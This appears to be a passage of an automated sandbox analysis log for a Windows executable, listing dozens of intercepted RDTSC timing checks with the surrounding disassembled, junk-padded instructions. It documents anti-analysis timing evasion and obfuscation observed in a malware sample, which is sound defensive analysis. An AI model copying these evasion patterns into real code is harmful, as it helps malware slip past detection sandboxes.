Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9E1C94 second address: 9E1C9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9E1C9A second address: 9E1C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 92ED6C second address: 92ED72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9E7DB5 second address: 9E7DB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9F5A8D second address: 9F5AAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jmp 00007FE5B8F4A74Eh 0x0000000c pushad 0x0000000d je 00007FE5B8F4A746h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9F54A7 second address: 9F54AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9F54AF second address: 9F54B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9F54B3 second address: 9F54C9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FE5B8D9CB5Ch 0x00000010 jo 00007FE5B8D9CB56h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9F54C9 second address: 9F54D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9F54D1 second address: 9F54D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9F54D5 second address: 9F54D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9F54D9 second address: 9F54F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE5B8D9CB65h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9FFDEA second address: 9FFDEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9FFDEE second address: 9FFE09 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE5B8D9CB61h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9FFE09 second address: 9FFE3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A750h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a je 00007FE5B8F4A79Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FE5B8F4A753h 0x00000017 jg 00007FE5B8F4A746h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9FFE3F second address: 9FFE74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB5Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE5B8D9CB61h 0x00000012 jmp 00007FE5B8D9CB5Fh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A021E8 second address: A021F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jg 00007FE5B8F4A746h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A09D98 second address: A09D9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A09D9C second address: A09DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A09DA2 second address: A09DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007FE5B8D9CB56h 0x0000000d jne 00007FE5B8D9CB56h 0x00000013 pushad 0x00000014 popad 0x00000015 je 00007FE5B8D9CB56h 0x0000001b popad 0x0000001c jng 00007FE5B8D9CB5Eh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A09BD8 second address: A09C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE5B8F4A752h 0x0000000a jo 00007FE5B8F4A746h 0x00000010 jnp 00007FE5B8F4A746h 0x00000016 jmp 00007FE5B8F4A752h 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A0D16C second address: A0D170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A0D170 second address: A0D18E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A74Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FE5B8F4A74Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A0D18E second address: A0D1A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE5B8D9CB61h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A0D1A4 second address: A0D1A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A1176F second address: A1177A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A1177A second address: A1177E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A11A6A second address: A11A75 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007FE5B8D9CB56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A11D36 second address: A11D3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A11E85 second address: A11E8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A11E8B second address: A11E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A11E91 second address: A11E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A12038 second address: A12044 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A12044 second address: A1204A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A1218F second address: A12196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A16A5A second address: A16A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A16A5F second address: A16A6D instructions: 0x00000000 rdtsc 0x00000002 js 00007FE5B8F4A748h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A16A6D second address: A16A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A16A71 second address: A16A84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A74Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A165CF second address: A16622 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FE5B8D9CB68h 0x00000008 pop ecx 0x00000009 jp 00007FE5B8D9CB58h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007FE5B8D9CB62h 0x00000019 jmp 00007FE5B8D9CB69h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A214DA second address: A2151C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE5B8F4A755h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007FE5B8F4A759h 0x00000011 pop edx 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FE5B8F4A74Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A2151C second address: A21520 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A21520 second address: A21530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FE5B8F4A746h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A4DBE1 second address: A4DBE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A4DEB5 second address: A4DEC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FE5B8F4A746h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A4E568 second address: A4E572 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FE5B8D9CB56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A4E6F7 second address: A4E6FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A4E6FB second address: A4E717 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE5B8D9CB60h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A54426 second address: A54430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A54430 second address: A54441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE5B8D9CB5Ch 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A57D38 second address: A57D3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A57D3C second address: A57D40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: A57D40 second address: A57D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FE5B8F4A752h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50F00A3 second address: 50F00A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50F00A9 second address: 50F00AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 512016C second address: 51201BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE5B8D9CB5Fh 0x00000009 adc al, FFFFFFFEh 0x0000000c jmp 00007FE5B8D9CB69h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 jmp 00007FE5B8D9CB5Ch 0x0000001d mov ax, 79D1h 0x00000021 popad 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov edi, 14D4043Ch 0x0000002b pushad 0x0000002c popad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B00B9 second address: 50B00BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B00BD second address: 50B00C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B00C3 second address: 50B0124 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE5B8F4A74Ch 0x00000009 or esi, 44650478h 0x0000000f jmp 00007FE5B8F4A74Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FE5B8F4A758h 0x0000001b jmp 00007FE5B8F4A755h 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 xchg eax, ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 movsx ebx, ax 0x0000002b mov eax, 092D119Bh 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B0124 second address: 50B0174 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 mov bx, D64Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FE5B8D9CB64h 0x00000013 xchg eax, ebp 0x00000014 pushad 0x00000015 mov esi, 75D5122Dh 0x0000001a mov si, A429h 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 jmp 00007FE5B8D9CB64h 0x00000026 push dword ptr [ebp+04h] 0x00000029 pushad 0x0000002a mov si, 2B0Dh 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B0174 second address: 50B0178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B0178 second address: 50B01B6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push dword ptr [ebp+0Ch] 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FE5B8D9CB5Eh 0x00000011 and si, 6858h 0x00000016 jmp 00007FE5B8D9CB5Bh 0x0000001b popfd 0x0000001c mov ecx, 182A290Fh 0x00000021 popad 0x00000022 push dword ptr [ebp+08h] 0x00000025 pushad 0x00000026 mov cx, 2B07h 0x0000002a push eax 0x0000002b push edx 0x0000002c mov bx, cx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50D0749 second address: 50D07AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, CFh 0x00000005 mov cx, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov ch, DCh 0x0000000f mov ax, di 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 jmp 00007FE5B8F4A759h 0x00000019 mov ebp, esp 0x0000001b jmp 00007FE5B8F4A74Eh 0x00000020 pop ebp 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FE5B8F4A74Eh 0x00000028 xor al, FFFFFF88h 0x0000002b jmp 00007FE5B8F4A74Bh 0x00000030 popfd 0x00000031 push eax 0x00000032 push edx 0x00000033 mov ecx, 74C8AD15h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50D0696 second address: 50D069C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50D069C second address: 50D06A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50D06A0 second address: 50D06DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov bx, cx 0x0000000d mov eax, 035CEFD7h 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 jmp 00007FE5B8D9CB5Ah 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FE5B8D9CB67h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50D03F1 second address: 50D0408 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A753h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50D0408 second address: 50D040E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E01E3 second address: 50E01E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E01E9 second address: 50E01EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E01EF second address: 50E01F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E01F3 second address: 50E024A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FE5B8D9CB63h 0x00000010 xor cx, 1ADEh 0x00000015 jmp 00007FE5B8D9CB69h 0x0000001a popfd 0x0000001b jmp 00007FE5B8D9CB60h 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov cx, dx 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E024A second address: 50E025E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A750h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 5120034 second address: 512009F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FE5B8D9CB68h 0x00000008 adc ecx, 0FFE0068h 0x0000000e jmp 00007FE5B8D9CB5Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FE5B8D9CB66h 0x0000001d push eax 0x0000001e jmp 00007FE5B8D9CB5Bh 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FE5B8D9CB65h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 512009F second address: 51200AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A74Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 51200AF second address: 51200CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov cx, di 0x00000013 mov dx, 27D2h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 51200CD second address: 51200D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 51200D3 second address: 51200EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a pushad 0x0000000b mov eax, 4FB5F8C9h 0x00000010 movzx esi, bx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov cl, dl 0x00000018 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50D05AD second address: 50D05C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A757h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50D05C8 second address: 50D0633 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a jmp 00007FE5B8D9CB60h 0x0000000f call 00007FE5B8D9CB62h 0x00000014 pushfd 0x00000015 jmp 00007FE5B8D9CB62h 0x0000001a adc ecx, 15BB5198h 0x00000020 jmp 00007FE5B8D9CB5Bh 0x00000025 popfd 0x00000026 pop esi 0x00000027 popad 0x00000028 mov dword ptr [esp], ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FE5B8D9CB61h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50D0633 second address: 50D0639 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E0EA0 second address: 50E0EA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E0EA6 second address: 50E0EB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ecx, edx 0x0000000e mov eax, edi 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E0EB7 second address: 50E0ED3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE5B8D9CB5Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E0ED3 second address: 50E0ED7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
